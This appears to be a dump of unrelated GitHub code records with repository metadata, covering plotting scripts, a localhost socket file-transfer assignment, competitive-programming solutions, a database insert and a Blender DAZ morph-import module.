\"Đạo hàm của Sigmoid(x)\")\n# plt.title('Đồ thị hàm Sigmoid và đạo hàm của hàm Sigmoid')\n# plt.plot(x, tanh, 'r', label = \"Tanh(x)\")\n# plt.plot(x, div_tanh, 'b', label = \"Đạo hàm của Tanh(x)\")\n# plt.title('Đồ thị hàm Tanh và đạo hàm của hàm Tanh')\n# plt.plot(x, relu, 'r', label = \"ReLU(x)\")\n# plt.plot(x, div_relu, 'b', label = \"Đạo hàm của ReLU(x)\")\n# plt.title('Đồ thị hàm ReLU và đạo hàm của hàm ReLU')\nplt.plot(x_pos, m_3_precision, '-or', label = \"Expected\")\nplt.xlabel(\"x\")\nplt.legend()\nplt.show() ","repo_name":"Sunfl4wer/graduation_thesis","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39846365908","text":"import socket\nimport time\nIP='localhost'\nPORT=80\nADDR=(IP,PORT)\nfile_name=\"my_file.txt\"\ndef main():\n client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n client.connect(ADDR)\n file=open(\"client_data/\"+file_name ,\"r\") #read particular file we need to send\n data=file.read() \n time.sleep(1) \n client.send(file_name.encode('utf-8')) #send name of the file to server\n print(\"[CLIENT] : filename is sent\")\n time.sleep(1) \n msg=client.recv(1024).decode('utf-8')\n print(msg)\n time.sleep(1) \n client.send(data.encode('utf-8'))\n print(\"[CLIENT] : file data sent\")\n msg=client.recv(1024).decode('utf-8');\n time.sleep(1) \n print(msg)\n time.sleep(2)\n client.close()\n \nif __name__==\"__main__\":\n main()","repo_name":"arpan-svci/BCSE-III-CN-Assignments","sub_path":"computer_networks_7/ftp/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26162645200","text":"def main():\n N,X = map(int,input().split())\n dp = [[] for _ in range(N+1)]\n \n dp[0].append(0)\n \n for i in range(1,N+1):\n a, b = map(int,input().split())\n for j in range(len(dp[i-1])):\n if dp[i-1][j]+a <= X:\n dp[i].append(dp[i-1][j]+a)\n if dp[i-1][j]+b <= X:\n dp[i].append(dp[i-1][j]+b)\n dp[i] = list(set(dp[i]))\n if X in dp[i]:\n print(\"Yes\")\n exit()\n\n print(\"No\")\n\nif __name__ == '__main__':\n main()","repo_name":"KK56ken/Competitive_professional","sub_path":"AtCoder/python/ABC_240/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41105019538","text":"import time\nimport sys\nimport argparse\n\nfrom PIL import Image\n\nfrom litex import RemoteClient\n\n# Framebuffer Test ---------------------------------------------------------------------------------\n\ndef framebuffer_test(port):\n bus = RemoteClient(port=port)\n bus.open()\n\n image = Image.open(\"glscopeclient_demo.png\")\n pixels = image.load()\n\n for y in range(480):\n for x in range(0, 800, 8):\n data = []\n for i in range(8):\n r, g, b = pixels[x + i, y]\n data.append((r << 16) | (g << 8) | (b << 0))\n bus.write(0x40c00000 + (y*800 + x)*4, data)\n\n bus.close()\n\n# Run ----------------------------------------------------------------------------------------------\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Framebuffer test utility\")\n parser.add_argument(\"--port\", default=\"1234\", help=\"Host bind port\")\n args = parser.parse_args()\n\n port = int(args.port, 0)\n\n framebuffer_test(port=port)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"360nosc0pe/scope","sub_path":"test/test_framebuffer.py","file_name":"test_framebuffer.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"48"} +{"seq_id":"24700608823","text":"\"\"\"CSC110 Fall 2020: Final Project (plot.py)\r\n \r\nPlotting line graphs for correlation between donations\r\nfrom fossil fuel companies to politicians and GHG emissions.\r\nThis was used for analysis alongside the graphing in Graph.py\r\n\"\"\"\r\n\r\nimport data\r\nimport plotly.graph_objects as go\r\nfrom typing import Tuple\r\n\r\n\r\ndef simple_linear_regression(list_x: list, list_y: list) -> Tuple[float, float]:\r\n \"\"\"Perform a linear regression on the given points.\r\n \r\n list_x is a list of x-coordinates and list_y is the list of corresponding y-coordinates.\r\n This function returns a pair of floats (a, b) such that the line\r\n y = a + bx is the approximation of this data.\r\n \r\n Preconditions:\r\n - len(list_x) > 0\r\n - len(list_y) > 0\r\n \"\"\"\r\n x_avg = find_average(list_x)\r\n y_avg = find_average(list_y)\r\n length = len(list_x)\r\n \r\n b_numerator = sum([(list_x[i] - x_avg) * (list_y[i] - y_avg) for i in range(0, length)])\r\n b_denominator = sum([(x - x_avg) ** 2 for x in list_x])\r\n b = b_numerator / b_denominator\r\n a = y_avg - b * x_avg\r\n return (a, b)\r\n\r\n\r\ndef find_average(nums: list) -> float:\r\n \"\"\"Return the average of a list of numbers.\r\n \"\"\"\r\n return sum(nums) / max(len(nums), 1)\r\n\r\n\r\ndef plot(years: list, list_x: list, list_y: list, a: float, b: float, country: str) -> None:\r\n \"\"\"\r\n Plot the given x- and y-coordinates and linear regression model using plotly.\r\n \"\"\"\r\n fig = go.Figure(data=go.Scatter(x=list_x, y=list_y, mode='markers',\r\n name='Year', text=years))\r\n \r\n fig.add_trace(go.Scatter(x=[0, max(list_x)], y=[a, a + b * max(list_x)],\r\n mode='lines', name='Regression line'))\r\n \r\n title = ': Effect of donations from fossil fuel companies ' \\\r\n 'to politicians on annual GHG emissions'\r\n fig.update_layout(title=country + title,\r\n xaxis_title='Donations ($)',\r\n yaxis_title='Total GHG Emissions (megatonnes of CO2 equivalent)')\r\n \r\n fig.show()\r\n\r\ndef showPlots() -> None:\r\n \"\"\"Show scatter plots for the datasets\"\"\"\r\n \r\n print('Importing data...')\r\n usa_data = data.UsaData()\r\n canada_data = data.CanadaData()\r\n print('Done')\r\n \r\n # get data from USA\r\n usa_years = usa_data.get_year()\r\n usa_donations = usa_data.get_donation()[1:]\r\n usa_emissions = usa_data.get_emission()[:-1]\r\n \r\n # get data from Canada\r\n canada_years = canada_data.get_year()\r\n canada_donations = canada_data.get_donation()\r\n print(canada_donations)\r\n canada_emissions = canada_data.get_emission()\r\n \r\n # plot graphs\r\n a_usa, b_usa = simple_linear_regression(usa_donations, usa_emissions)\r\n plot(usa_years, usa_donations, usa_emissions, a_usa, b_usa, 'USA')\r\n \r\n a_canada, b_canada = simple_linear_regression(canada_donations, canada_emissions)\r\n plot(canada_years, canada_donations, canada_emissions, a_canada, b_canada, 'Canada')\r\n\r\n print('Donations from USA: ' + str(usa_donations))\r\n print('Emissions from USA: ' + str(usa_emissions) + '\\n')\r\n print('Donations from Canada: ' + str(canada_donations))\r\n print('Emissions from Canada: ' + str(canada_emissions))\r\n\r\nif __name__ == \"__main__\":\r\n showPlots()\r\n","repo_name":"Danx1129/CSC110_Project","sub_path":"CSC110 Project/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32661284389","text":"# 테스트케이스 12만 통과 X\ndef solution(number, k):\n answer = \"\"\n stack = []\n\n stack.append(number[0])\n for i in range(1, len(number)) :\n \n while stack and stack[-1] < number[i] :\n if k > 0 :\n stack.pop()\n k -= 1\n else :\n break\n \n stack.append(number[i])\n\n # print(stack)\n answer = ''.join(stack)\n return answer\n\nnumber = \"1\"\nk = 1\nsolution(number, k)\n# -------------------------------------------------------------------------\n\ndef solution(number, k):\n answer = \"\"\n stack = []\n\n stack.append(number[0])\n for i in range(1, len(number)) :\n \n while stack and stack[-1] < number[i] and k > 0:\n stack.pop()\n k -= 1\n\n stack.append(number[i])\n\n print(stack)\n answer = ''.join(stack)\n return answer\n\nnumber = \"1\"\nk = 1\nsolution(number, k)\n# 참고 : https://train-validation-test.tistory.com/entry/%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%98%EB%A8%B8%EC%8A%A4-level-2-%ED%81%B0-%EC%88%98-%EB%A7%8C%EB%93%A4%EA%B8%B0-%ED%8C%8C%EC%9D%B4%EC%8D%AC\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\n# 210119 정답코드\ndef solution(number, k) :\n box = []\n for i in number :\n while box and box[-1] < i and k > 0 :\n k -= 1\n del box[-1]\n box.append(i)\n \n if k != 0 :\n box = box[:-k]\n\n print(box)\n return ''.join(box)\n\nnumber = \"1\"\nk = 1\nsolution(number, k)\n\n\n\n","repo_name":"KimHyungkeun/Algorithm","sub_path":"SWcodingTest/2day/큰수만들기Retry.py","file_name":"큰수만들기Retry.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1116695417","text":"#수의 갯수자체는 1만개이지만 합이 300억제한, 어짜피 근데 큰수 연산해도 시간제한이랑 관련없을거 같긴함\n\nimport sys\ninput = sys.stdin.readline\n\nn,m = map(int, input().split())\narr = list(map(int,input().split()))\n\nst=0\nen=0\nlocalsum=arr[0]\ncnt = 0\n\nwhile st<=en 단일아니면 st만 이동,단일이면 st,en 둘다이동\n if st m:\n tmp -= a[k]\n k += 1\n cnt += (tmp == m)\nprint(cnt)\n##################################\n\n\n\nN, M = map(int, input().split(' '))\nA = list(map(int, input().split(' ')))\ncnt = 0\nx = 0\nend = 0\n\nfor start in range(N) : #이게 좋은듯? 어짜피 st는 무조건 한칸씩 처음부터 끝까지 이동시키니까 for로 한칸씩 이동시키도록 하면 코드 많이 단축됨\n while x < M and end < N :\n x += A[end]\n end += 1\n if x == M :\n cnt += 1\n x -= A[start]\n\nprint(cnt)\n\n##################################","repo_name":"asdfqrt/barkingdog","sub_path":"16강 투 포인터/수들의 합 2.py","file_name":"수들의 합 2.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26632324575","text":"import pandas\nimport psycopg2\nimport json\nfrom postgre_db_interface import *\nfrom sqlalchemy import create_engine\nfrom settings import Settings\n\n\"\"\" Simple script to test intermediate insertion of scraped topics \"\"\"\n\nif __name__ == \"__main__\":\n\n # Connect to db:\n params = PostgreDBInterface.config()\n # connection = psycopg2.connect(**params)\n connection = create_engine('postgresql://postgres:1234@localhost:5432/news')\n\n with open(Settings.global_path + \"data/topics_update.json\", \"r\") as f:\n topics_update = json.loads(f.read())\n\n new_topics = topics_update[\"new_topics\"]\n inactive_topics = topics_update[\"inactive\"]\n\n if len(new_topics) > 0:\n df = pandas.DataFrame()\n for nt in new_topics:\n if nt[\"active\"] != 0:\n nt[\"active\"] = True\n df = df.append(nt, ignore_index=True)\n\n df[\"active\"] = df[\"active\"].astype(bool)\n df = df.drop(\"topic_id\", axis=1)\n df.to_sql('topics', connection, if_exists=\"append\", index=False)\n\n\n","repo_name":"DmitriyGordeev/theverge_scraper","sub_path":"insert_topics.py","file_name":"insert_topics.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12885558397","text":"from os import listdir\nfrom os.path import isfile, join\nfrom PIL import Image, ImageOps\nimport itertools\n\n\ndef get_image_names(prefix):\n return [f for f in listdir('./') \\\n if f.startswith(prefix) and isfile(join('./', f))]\n\n\n# Load the base image\nim = Image.open('base.png')\nim_spec = Image.open('base_specular.png')\nim_norm = Image.open('base_normal.png')\n\n# Setup the image files combinational list\nraw = []\nprefixes = ['1stcorner.', 'facade.', 'roof.', 'shop.']\nfor prefix in prefixes:\n raw.append(get_image_names(prefix))\ncombs = list(itertools.product(*raw))\n\n# Combine images and save them\nfor i,comb in enumerate(combs):\n fpath = '../FeaturesHouse_{:03d}.png'.format(i + 1)\n new = im.copy()\n for img_path in comb:\n add = Image.open(img_path)\n new.paste(add, (0,0), add)\n new.save(fpath)\n fpath = '../FeaturesHouseSpecular_{:03d}.png'.format(i + 1)\n new = im_spec.copy()\n for img_path in comb:\n add = Image.open(img_path[:-8] + '_specular' + img_path[-8:])\n new.paste(add, (0,0), add)\n new.save(fpath)\n fpath = '../FeaturesHouseNormal_{:03d}.png'.format(i + 1)\n new = im_norm.copy()\n for img_path in comb:\n add = Image.open(img_path[:-8] + '_normal' + img_path[-8:])\n new.paste(add, (0,0), add)\n new = ImageOps.flip(new)\n new.save(fpath)\n","repo_name":"spring1944/models","sub_path":"features/HouseGenerator/recombinator.py","file_name":"recombinator.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1371828468","text":"\"\"\"def sum_list(given_list):\n sum=0\n for i in given_list:\n sum+=i\n return sum**2\ngiven_list=[12,-7,5,-89.4,3,27,56,57.3]\nsum=sum_list(given_list)\n\"\"\"\n\n\"\"\"def is_prime_or_not(num1):\n count=0\n for i in range(2,num1):\n if num1%i==0:\n count=1\n if count==0:\n print(\"\\n{} is a prime number\".format(num1))\n else:\n print(\"\\n{} is not a prime number\".format(num1))\n\nnum1=int(input(\"\\nEnter first number\"))\nis_prime_or_not(num1)\n\ndef print_prime_numbers_between(num2):\n for x in range(2,num2):\n if is_prime_or_not(x):\n print(x)\n\nnum2=int(input(\"Enter a second number\"))\nprint_prime_numbers_between(num2)\"\"\"\n\n\"\"\"\ndef is_prime(num1):\n count=0\n for i in range(2,num1):\n if num1%i==0:\n count=1\n if count==0:\n print(\"\\n{} is a prime number\".format(num1))\n\ndef print_prime_numbers_between(num2,num3):\n for y in range(num2,num3):\n if is_prime(y):\n print(y)\n\nnum3=int(input(\"\\nEnter a third number\"))\nnum4=int(input(\"\\nEnter the last number\"))\nprint_prime_numbers_between(num3,num4)\n\"\"\"\n\n\n\"\"\"def is_prime_(n):\n if n<2:\n return False\n elif n==2:\n return True\n else:\n for i in range(2,n):\n if n%i==0:\n return False\n return True\n\n\nn=int(input(\"Enter a number\"))\n\n\nfor i in range(2,n):\n if is_prime_(i):\n print(i)\"\"\"\n\n########GET OVERLAP#######\n\"\"\"\nimport random\nrandom.seed(123)\n\ndef get_random_list(b,e,N):\n r_list=random.sample(range(b,e),N)\n return r_list \ndef get_overlap(L1,L2):\n L3=[]\n for num in L1:\n if num in L2:\n L3.append(num)\n return L3\n\ndef main():\n list1=get_random_list(b=0,e=10,N=5)\n list2=get_random_list(b=0,e=10,N=5)\n print(list1)\n print(list2)\n list3=get_overlap(list1,list2)\n print(list3)\n\nmain()\n\ndef binary_to_dec(n):\n d=0\n get_reverse=str(n)[::-1]\n for i in range(len(get_reverse)):\n d=d+(2**i)*int(get_reverse[i])\n\n return d\nprint(binary_to_dec(\"100010\"))\n\ndef dec_to_binary(d):\n b=\"\"\n while d>0:\n b+=str(d%2)\n d=d//2\n return(b[::-1])\n \nprint(dec_to_binary(34))\n#100010\n#010001\"\"\"\n\n\n\ndef sum_of_nested_list(x):\n if len(x)==0:\n return 0\n else:\n if isinstance(x,list):\n return sum_of_nested_list(x[0]) + sum_of_nested_list(x[1:])\n else :\n return sum_of_nested_list(x)[0]+sum_of_nested_list(x)[1:]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"o06375718/270201071","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73335748626","text":"def gap_ratio_beam_search(env, initial_state, num_steps, beam_size, branching, subsampling):\n\n spec = env.action_spec()\n states = [initial_state[np.newaxis,:]]\n actions = [None]\n\n for t in range(num_steps):\n print(f\"step {t} of {num_steps}...\")\n\n P = len(states[t])\n child_states = np.empty((P, branching, 2), dtype=np.float32)\n if t == 0 or not do_walk:\n child_actions = rng.uniform(-1, 1, (P, branching, 1)).astype(np.float32)\n else:\n child_actions = np.random.randn(P, branching, 1).astype(np.float32) * walk_stdev\n child_actions += actions[t][:, np.newaxis, :]\n\n for p in range(P):\n for b in range(branching):\n env.state = states[t][p].copy()\n child_states[p,b], _, _, _ = env.step(np.clip(child_actions[p,b], -1, 1))\n child_states = child_states.reshape(-1, 2)\n child_actions = child_actions.reshape(-1, 1)\n\n if len(child_states) < beam:\n states.append(child_states)\n actions.append(child_actions)\n continue\n\n # set-difference farthest point algorithm\n # modified from\n # https://doi.org/10.1137/15M1051300 | https://arxiv.org/pdf/1411.7819.pdf\n # https://doi.org/10.1016/0304-3975(85)90224-5\n\n previous_states = np.concatenate(states, axis=0)\n if len(previous_states) > sampling:\n subsample = np.random.choice(len(previous_states), size=sampling, replace=False)\n previous_states = previous_states[subsample]\n bkgd_states = np.concatenate((child_states, previous_states), axis=0)\n\n dists = np.linalg.norm(child_states[:,np.newaxis,:] - bkgd_states[np.newaxis,:,:], axis=2)\n included = np.ones(len(bkgd_states), dtype=bool)\n included[:len(child_states)] = False\n excluded = list(range(len(child_states)))\n\n a = dists[:,included].min(axis=1).argmax()\n included[excluded.pop(a)] = True\n \n for p in range(1, beam):\n a = dists[excluded][:,included].min(axis=1).argmax()\n included[excluded.pop(a)] = True\n\n new_actions = child_actions[included[:len(child_states)]]\n new_states = child_states[included[:len(child_states)]]\n states.append(new_states)\n actions.append(new_actions)\n\n # pt.cla()\n # draw(states)\n # # input('.')\n\n env.close()\n\n\n","repo_name":"garrettkatz/cmrl","sub_path":"gap_ratio_beam_search.py","file_name":"gap_ratio_beam_search.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70053114065","text":"# Reverse Words in a String III\n\ns = \"Let's take LeetCode contest\"\n\n\ndef reverseWords(s) :\n ans = []\n s2 = s.split(\" \")\n # print(s2)\n for word in s2:\n ans.append(word[::-1])\n # print(ans)\n return \" \".join(ans)\n\nprint(reverseWords(s))\n\n\ns = \"Let's take LeetCode contest\"\n\ndef reverseWords(s):\n i = 0\n j = 0\n ans = \"\"\n while j 1:\r\n msg = (\"Not a morph asset:\\n '%s'\" % filepath)\r\n if self.suppressError:\r\n print(msg)\r\n else:\r\n raise DazError(msg)\r\n return []\r\n\r\n skey = None\r\n prop = None\r\n if self.useShapekeys and isinstance(asset, Morph) and self.mesh and self.mesh.type == 'MESH':\r\n if asset.vertex_count != len(self.mesh.data.vertices):\r\n if theSettings.verbosity > 2:\r\n msg = (\"Vertex count mismatch:\\n %d != %d\" % (asset.vertex_count, len(self.mesh.data.vertices)))\r\n if self.suppressError:\r\n print(msg)\r\n else:\r\n raise DazError(msg)\r\n return []\r\n asset.buildMorph(self.mesh, ob.DazCharacterScale, self.useSoftLimits)\r\n skey,ob,sname = asset.rna\r\n if self.rig and theSettings.useDrivers:\r\n prop = propFromName(sname, self.type, self.prefix, self.rig)\r\n skey.name = prop\r\n min = skey.slider_min if theSettings.useDazPropLimits else None\r\n max = skey.slider_max if theSettings.useDazPropLimits else None\r\n makeShapekeyDriver(ob, prop, skey.value, self.rig, prop, min=min, max=max)\r\n props = [prop]\r\n\r\n if (self.useDrivers and\r\n isinstance(asset, FormulaAsset) and\r\n asset.formulas and\r\n self.rig):\r\n from .formula import buildShapeFormula, buildPropFormula\r\n if not self.useShapekeysOnly:\r\n props = buildPropFormula(asset, scn, self.rig, self.type, self.prefix, self.errors)\r\n props = list(props)\r\n if self.useShapekeys:\r\n success = buildShapeFormula(asset, scn, self.rig, self.mesh)\r\n if self.useShapekeysOnly and not success and skey:\r\n print(\"Could not build shape formula\", skey.name)\r\n\r\n if props:\r\n return props\r\n elif skey:\r\n return [skey.name]\r\n else:\r\n return []\r\n\r\n\r\ndef propFromName(key, type, prefix, rig):\r\n if prefix:\r\n names = theMorphNames[type]\r\n name = nameFromKey(key, names, rig)\r\n if name:\r\n prop = prefix+name\r\n return prop\r\n return key\r\n\r\n\r\nclass LoadShapekey(LoadMorph):\r\n\r\n useDrivers = False\r\n\r\n\r\n\r\n#------------------------------------------------------------------\r\n# Load typed morphs base class\r\n#------------------------------------------------------------------\r\n\r\nclass LoadAllMorphs(LoadMorph):\r\n\r\n suppressError = True\r\n\r\n def execute(self, context):\r\n try:\r\n self.loadAllMorphs(context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n\r\n def loadAllMorphs(self, context):\r\n import time\r\n from .main import finishMain\r\n from .finger import getFingeredCharacter\r\n\r\n scn = context.scene\r\n setupMorphPaths(scn, False)\r\n addDrivers = (scn.DazAddFaceDrivers and not self.useShapekeysOnly)\r\n\r\n self.rig, self.mesh, char = getFingeredCharacter(context.object)\r\n if self.mesh is None:\r\n if self.useShapekeysOnly:\r\n raise DazError(\"No mesh found\")\r\n elif self.rig.DazRig == \"genesis3\":\r\n char = \"Genesis3-female\"\r\n self.mesh = self.rig\r\n addDrivers = True\r\n elif self.rig.DazRig == \"genesis8\":\r\n char = \"Genesis8-female\"\r\n self.mesh = self.rig\r\n addDrivers = True\r\n else:\r\n print(\"Can not add morphs to this mesh: %s\" % self.rig.DazRig)\r\n return\r\n\r\n self.rig[\"Daz\"+self.type] = char\r\n self.mesh[\"Daz\"+self.type] = char\r\n self.rig.DazNewStyleExpressions = True\r\n\r\n try:\r\n files = theMorphFiles[char][self.type]\r\n except KeyError:\r\n files = []\r\n if not files:\r\n raise DazError(\"No morph files:\\nCharacter: %s\\nMorph type: %s\" % (char, self.type))\r\n\r\n theSettings.forMorphLoad(self.mesh, scn, addDrivers)\r\n self.errors = {}\r\n t1 = time.clock()\r\n print(\"\\n--------------------\\n%s\" % self.type)\r\n snames = []\r\n for name,filepath in files.items():\r\n if hasattr(scn, \"Daz\"+name) and getattr(scn, \"Daz\"+name):\r\n print(\"*\", name)\r\n snames += self.getSingleMorph(filepath, scn)\r\n else:\r\n print(\"-\", name)\r\n updateDrivers(self.mesh)\r\n updateDrivers(self.rig)\r\n finishMain(filepath, t1)\r\n if self.errors:\r\n print(\"but there were errors:\")\r\n for err,struct in self.errors.items():\r\n print(\"%s:\" % err)\r\n print(\" Props: %s\" % struct[\"props\"])\r\n print(\" Bones: %s\" % struct[\"bones\"])\r\n\r\n\r\nclass DAZ_OT_LoadAllUnits(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_units\"\r\n bl_label = \"Load Face Units\"\r\n bl_description = \"Load all face unit morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Units\"\r\n prefix = \"DzU\"\r\n\r\n\r\nclass DAZ_OT_LoadAllExpressions(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_expressions\"\r\n bl_label = \"Load Expressions\"\r\n bl_description = \"Load all expression morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Expressions\"\r\n prefix = \"DzE\"\r\n\r\n\r\nclass DAZ_OT_LoadAllVisemes(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_visemes\"\r\n bl_label = \"Load Visemes\"\r\n bl_description = \"Load all viseme morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Visemes\"\r\n prefix = \"DzV\"\r\n\r\n\r\nclass DAZ_OT_LoadAllCorrectives(bpy.types.Operator, LoadAllMorphs):\r\n bl_idname = \"daz.load_all_correctives\"\r\n bl_label = \"Load Correctives\"\r\n bl_description = \"Load all corrective morphs\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Correctives\"\r\n prefix = \"DzC\"\r\n useShapekeysOnly = True\r\n useSoftLimits = False\r\n\r\n#------------------------------------------------------------------------\r\n# Import general morph or driven pose\r\n#------------------------------------------------------------------------\r\n\r\nclass DAZ_OT_ImportMorph(bpy.types.Operator, LoadMorph, DazImageFile, MultiFile, MorphStrings):\r\n bl_idname = \"daz.import_morph\"\r\n bl_label = \"Import Morph(s)\"\r\n bl_description = \"Import morph(s) from native DAZ file(s) (*.duf, *.dsf)\"\r\n bl_options = {'UNDO'}\r\n\r\n type = \"Shapes\"\r\n prefix = \"\"\r\n custom = \"DazCustomMorphs\"\r\n catgroup = \"DazMorphCats\"\r\n\r\n def draw(self, context):\r\n self.layout.prop(self, \"useDrivers\")\r\n self.layout.prop(self, \"catname\")\r\n\r\n\r\n def execute(self, context):\r\n try:\r\n self.importMorphs(context.scene)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n\r\n def invoke(self, context, event):\r\n from .fileutils import getFolder\r\n from .finger import getFingeredCharacter\r\n self.rig, self.mesh, char = getFingeredCharacter(context.object)\r\n folder = getFolder(self.mesh, context.scene, [\"Morphs/\", \"\"])\r\n if folder is not None:\r\n self.properties.filepath = folder\r\n context.window_manager.fileselect_add(self)\r\n return {'RUNNING_MODAL'}\r\n\r\n\r\n def importMorphs(self, scn):\r\n from .driver import setBoolProp\r\n snames = self.getMorphs(self.filepath, scn)\r\n addToCategories(self.rig, snames, self.catname, self.catgroup)\r\n if self.rig:\r\n setBoolProp(self.rig, self.custom, True)\r\n if self.mesh:\r\n setBoolProp(self.mesh, self.custom, True)\r\n if self.errors:\r\n raise DazError(theLimitationsMessage)\r\n\r\n\r\n def getMorphs(self, filepath, scn):\r\n import time\r\n from .asset import clearAssets\r\n from .main import finishMain\r\n from .fileutils import getMultiFiles\r\n\r\n if self.mesh:\r\n ob = self.mesh\r\n elif self.rig:\r\n ob = self.rig\r\n else:\r\n raise DazError(\"Neither mesh nor rig selected\")\r\n theSettings.forMorphLoad(ob, scn, self.useDrivers)\r\n\r\n self.errors = {}\r\n t1 = time.clock()\r\n print(\"\\n--------------------\")\r\n snames = []\r\n paths = getMultiFiles(self, [\"duf\", \"dsf\"])\r\n self.suppressError = (len(paths) > 1)\r\n for path in paths:\r\n file = os.path.basename(path)\r\n names = self.getSingleMorph(path, scn)\r\n if names:\r\n print(\"*\", file)\r\n snames += names\r\n else:\r\n print(\"-\", file)\r\n updateDrivers(self.rig)\r\n updateDrivers(self.mesh)\r\n finishMain(filepath, t1)\r\n if self.errors:\r\n print(\"but there were errors:\")\r\n for err,struct in self.errors.items():\r\n print(\"%s:\" % err)\r\n print(\" Props: %s\" % struct[\"props\"])\r\n print(\" Bones: %s\" % struct[\"bones\"])\r\n\r\n return snames\r\n\r\n#------------------------------------------------------------------------\r\n# Categories\r\n#------------------------------------------------------------------------\r\n\r\ndef addToCategories(rig, snames, catname, catgroup=\"DazMorphCats\"):\r\n from .driver import setBoolProp\r\n if snames and rig is not None:\r\n categories = getattr(rig, catgroup)\r\n cats = dict([(cat.name,cat) for cat in categories])\r\n if catname not in cats.keys():\r\n cat = categories.add()\r\n cat.name = catname\r\n else:\r\n cat = cats[catname]\r\n setBoolProp(rig, \"DazShow\"+catname, True)\r\n\r\n morphs = dict([(morph.prop,morph) for morph in cat.morphs])\r\n for sname in snames:\r\n if sname not in morphs.keys():\r\n morph = cat.morphs.add()\r\n else:\r\n morph = morphs[sname]\r\n\r\n morph.prop = sname\r\n if sname[0:4].lower() == \"ctrl\":\r\n morph.name = sname[4:]\r\n elif sname[1:5].lower() == \"ctrl\":\r\n morph.name = sname[5:]\r\n else:\r\n morph.name = sname\r\n\r\n#------------------------------------------------------------------------\r\n# Rename category\r\n#------------------------------------------------------------------------\r\n\r\ndef getOpenAttr(catgroup):\r\n return (\"%sOpen\" % catgroup)\r\n\r\n\r\nclass ChangeCategory(CatGroupString):\r\n def execute(self, context):\r\n try:\r\n rig = context.object\r\n scn = context.scene\r\n categories = getattr(rig, self.catgroup)\r\n catname = getattr(scn, \"%sContent\" % self.catgroup)\r\n key = (\"DazShow%s\" % catname)\r\n self.doChange(rig, scn, categories, catname, key)\r\n except DazError:\r\n handleDazError(context)\r\n finally:\r\n attr = getOpenAttr(self.catgroup)\r\n setattr(context.scene, attr, False)\r\n return {'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_RenameCategoryOK(bpy.types.Operator, ChangeCategory):\r\n bl_idname = \"daz.rename_category\"\r\n bl_label = \"Rename Category\"\r\n bl_description = \"Rename selected category\"\r\n bl_options = {'UNDO'}\r\n\r\n def doChange(self, rig, scn, categories, catname, key):\r\n from .driver import setBoolProp\r\n cat = categories[catname]\r\n cat.name = scn.DazNewCatName\r\n if key in rig.keys():\r\n show = rig[key]\r\n del rig[key]\r\n else:\r\n show = True\r\n setBoolProp(rig, \"DazShow%s\" % cat.name, show)\r\n\r\n\r\nclass DAZ_OT_RemoveCategoryOK(bpy.types.Operator, ChangeCategory):\r\n bl_idname = \"daz.remove_category\"\r\n bl_label = \"Remove Category\"\r\n bl_description = \"Remove selected category and associated drivers\"\r\n bl_options = {'UNDO'}\r\n\r\n def doChange(self, rig, scn, categories, catname, key):\r\n from .driver import removePropDrivers\r\n from .daz import removeFromPropGroup\r\n #if len(cat.morphs) > 0:\r\n # raise DazError(\"Cannot remove non-empty category: \\n%s\" % cat.name)\r\n cat = categories[catname]\r\n for grp in cat.morphs:\r\n if grp.prop in rig.keys():\r\n rig[grp.prop] = 0.0\r\n path = ('[\"%s\"]' % grp.prop)\r\n keep = removePropDrivers(rig, path, rig)\r\n for ob in rig.children:\r\n if ob.type == 'MESH':\r\n if removePropDrivers(ob.data.shape_keys, path, rig):\r\n keep = True\r\n if grp.prop in rig.keys():\r\n for pb in rig.pose.bones:\r\n removeFromPropGroup(pb.DazLocProps, grp.prop)\r\n removeFromPropGroup(pb.DazRotProps, grp.prop)\r\n removeFromPropGroup(pb.DazScaleProps, grp.prop)\r\n if not keep:\r\n del rig[grp.prop]\r\n for n,catn in enumerate(categories):\r\n if cat == catn:\r\n categories.remove(n)\r\n break\r\n if key in 